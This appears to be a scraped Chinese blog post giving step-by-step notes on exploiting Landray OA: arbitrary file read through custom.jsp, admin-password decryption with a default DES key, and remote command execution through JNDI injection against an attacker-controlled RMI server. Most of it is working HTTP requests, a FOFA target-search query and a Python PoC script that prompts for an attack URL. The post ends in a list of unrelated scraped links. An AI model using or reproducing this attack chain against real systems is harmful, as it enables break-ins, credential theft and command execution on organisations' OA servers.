蓝凌OA系统任意文件读取
使用需知
由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。
本文为工作中遇到的漏洞,文章为自己复现做的相关笔记,参考了很多前人的资料,只是做个笔记。
一、漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时可利用ssrf进行远程命令执行。
二、漏洞影响
蓝凌OA
三、任意文件读取复现
fofa语法
app=“Landray-OA系统”
利用 蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件
读取路径:
/WEB-INF/KmssConfig/admin.properties
如果用BP抓包,POC如下
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
或者用hackbar,POST方法提交下列数据:
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
获取密码DES解密登陆后台:默认密钥为 kmssAdminKey
注意没有\r
获得密码:******
访问后台
http://漏洞ip/admin.do
输入获得的密码即可登录。
如果服务器是LINUX,似乎可以这样做,但我没有弄成功
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipvar={"body":{"file":"file:///etc/passwd"}}
另外附上大佬们的POC脚本;
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.techimport base64
import requests
import random
import re
import json
import sysdef title():print('+------------------------------------------')print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m')print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m')print('+ 33[34m公众号 : PeiQi文库 33[0m')print('+ 33[34mVersion: 蓝凌OA 任意文件读取 33[0m')print('+ 33[36m使用格式: python3 poc.py 33[0m')print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = 'var={"body":{"file":"file:///etc/passwd"}}'try:response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)print("33[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp 33[0m".format(target_url))if "root:" in response.text and response.status_code == 200:print("33[36m[o] 成功读取 /etc/passwd n[o] 响应为:{} 33[0m".format(response.text))except Exception as e:print("33[31m[x] 请求失败:{} 33[0m".format(e))sys.exit(0)#
if __name__ == '__main__':title()target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))POC_1(target_url)
四、配合SSRF进行命令执行复现
使用JNDI注入工具启动监听:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "Command" -A VPS ip
-A参数填写vps地址,就是你服务器的地址。
-C参数填写自己的命令即可,一般都是去ping dnslog
Dnslog:http://www.dnslog.cn/
如图所示:
随后用BP抓取后台的包,利用已登录的cookie去进行命令执行。这里需要注意把JDK 1.7对应的rmi地址,填到BP抓到的包中
POST /admin.do?method=testDbConn&datasource=rmi://VPS IP:1099/erzyyz HTTP/1.1
就是这样子了。
附上JNDI注入工具下载地址
https://github.com/feihong-cs/JNDIExploit/tags
参考链接:
https://www.jianshu.com/p/a9250d02aeb1
https://idc.wanyunshuju.com/aqld/2202.html
蓝凌OA系统任意文件读取相关推荐
- 蓝凌ekp开发_蓝凌OA系统,蓝凌EKP,蓝凌KK__房地产案例应用__恒大集团
作为中国地产行业标杆,恒大集团拥有员工39000多人,在全国33个城市设立了分公司,在全国122个主要城市拥有大型项目229个.如何实现全集团的协同沟通?如何结合业务规范.统一流程?如何实现专业知识. ...
- 一米OA任意文件读取漏洞
漏洞描述 一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞 漏洞影响 一米OA 网络测绘 app="一米OA" 漏洞复现 出现漏洞的文件 <%@
- 深信服 应用交付报表系统 download.php 任意文件读取漏洞
漏洞描述: 深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件. 漏洞利用条件: download.php文件接口 漏洞影响范围: 应用交 ...
- 蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现 一.概述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通 ...
- 蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
漏洞描述: 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件. 漏洞利用条件: / 漏洞影响范围: / 漏洞复现: 1.P ...
- python文件审计系统_Python代码审计实战案例总结之CRLF和任意文件读取
介绍 Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成.目前Python代码审计思路,呈现分散和多样的趋势.Python微薄研发经验以及结合实际遇到的思路和技巧进行总结 ...
- 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell
点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...
- 应用服务器Glassfish任意文件读取漏洞
catalogue 1. 前言和技术背景 2. Glassfish安装配置 3. 漏洞利用 4. 漏洞缓解(修复) 1. 前言和技术背景 0x1: GlassFish是什么 GlassFish 是用于 ...
- ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现及环境搭建
ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏 ...
- 【MetInfo任意文件读取】--任意文件读取漏洞
文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...
最新文章
- memset()函数用法及其作用
- ubuntu12.0.4不能正常关机和重启的解决方法
- 提取图像的边界,用数字标记不同的目标边界
- 动态规划解题套路框架
- 利用JS调用aspx页面(转载)
- art-template模板引擎详解
- MFC多文档中opencv处理图像打开、保存
- java extjs4 分页_extjs学习笔记(四)带分页的grid
- 中国晶体谐振器行业市场供需与战略研究报告
- wpf项目无法使用针式打印机_针式打印机的常见故障和解决方法2
- 深入浅出JavaScript (五) 详解Document.write()方法
- kotlin的Viewpage2+Fragment的简单使用(setUserVisibleHint方法过时)
- 龙芯3号处理器-龙芯3A1000,龙芯3A2000/3B2000,龙芯3A1500I,龙芯3A3000/3B3000
- Codeforces Round #554 (Div. 2) 1152B. Neko Performs Cat Furrier Transform
- 嵌入式Linux设置开机自动运行程序(基于BusyBox init)
- HDU 5855-最大权闭合图(-最小割应用)
- 《Cracking the Coding Interview程序员面试金典》----猫狗收容所
- rpg maker mv使用ajax,Rpgmakermv(15) PH任务插件
- 微信小程序项目实例——手势解锁
- python perl lisp_巴别塔-编程语言之旅【转】——C、C++、Lisp、Java、Perl、Ruby、Python核心比较...
热门文章
- 小白最需要了解的计算机基础知识
- 前端每日实战:77# 视频演示如何用纯 CSS 创作旗帜飘扬的动画
- thinkphp 3.1.3 php版本,ThinkPHP
- 给定一个设备编号区间[start, end],包含4或18的编号都不能使用,如:418、148、718不能使用,108可用
- python处理can协议文件_用Python处理CAN数据库
- 数据库-订单信息表(单表)_思路清晰_设计简洁
- 亚马逊服务器443端口开放配置aws
- 出谋划策 小型网吧组网方案精心推荐(转)
- BZOJ4567 [SCOI2016]背单词
- ctf镜子里面的世界_一个小编姐姐的CTF入坑之旅